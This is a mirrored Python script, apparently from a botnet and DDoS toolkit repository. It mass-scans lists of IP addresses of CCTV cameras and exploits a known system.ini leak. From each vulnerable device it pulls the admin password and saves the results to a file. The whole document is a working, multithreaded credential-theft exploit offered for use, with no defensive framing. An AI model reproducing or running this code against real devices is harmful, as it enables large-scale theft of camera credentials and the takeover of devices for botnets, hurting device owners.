Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/IPCAM FULL/dumper.py
5038 views
1
#!/usr/bin/python

2
# Bruteforce tool for CCTV RCE Exploit

3
# Usage: python3 dumper.py 1000

4


5
import urllib.request, threading, socket, time, sys

6
if len(sys.argv) != 2:

7
	print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ")

8
	sys.exit()

9
	

10
lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0

11


12
# Open output.txt

13
list = open("output.txt", "r")

14
scan = list.read()

15
list.close()

16


17
scan = scan.split("\n")

18
while "\n" in scan:

19
	scan.remove("\n")

20
pretotal = len(scan)

21
def dumpcreds():

22
	global finalprintout

23
	global total

24
	global scan

25
	while len(scan) > 0:

26
		try:

27
			with lock:

28
				ip = scan.pop()

29
			with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:

30
				reply = str(response.read())

31
				if reply.find("admin") != -1:

32
					reply = reply[reply.find("admin"):]

33
					while reply.find("\\x00") != -1:

34
						reply = reply.replace("\\x00", "")

35
					password = reply[5:reply.find("\\")]

36
					if password.find("/") != -1:

37
						password = password[:password.find("/")]

38
					print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip)

39
					with lock:

40
						finalprintout += ip + ":admin:" + password + "\n"

41
						total += 1

42
		except:

43
			pass

44


45
print("	\x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m")

46
print("	\x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to ★Cam★ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]")

47
time.sleep(6)

48
print("      \x1b[1;35mDumping Credentials, please wait")

49
time.sleep(4)

50


51
for i in range(0, threadcount+1):

52
	threads.append(threading.Thread(target=dumpcreds))

53


54
for thread in threads:

55
	try:

56
		thread.daemon = True

57
		thread.start() 

58
	except:

59
		pass

60


61
for thread in threads:

62
	try:

63
		thread.join()

64
	except:

65
		pass

66
		

67
while 1:

68
	time.sleep(1)

69
	done = False

70
	for thread in threads:

71
		if thread.isAlive() == True:

72
			done = False

73
			break

74
		else:

75
			done = True

76
	if done == True:

77
		writingit = open("vuln.txt", "w")

78
		writingit.write(finalprintout)

79
		writingit.close()

80
		print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")

81
		break

82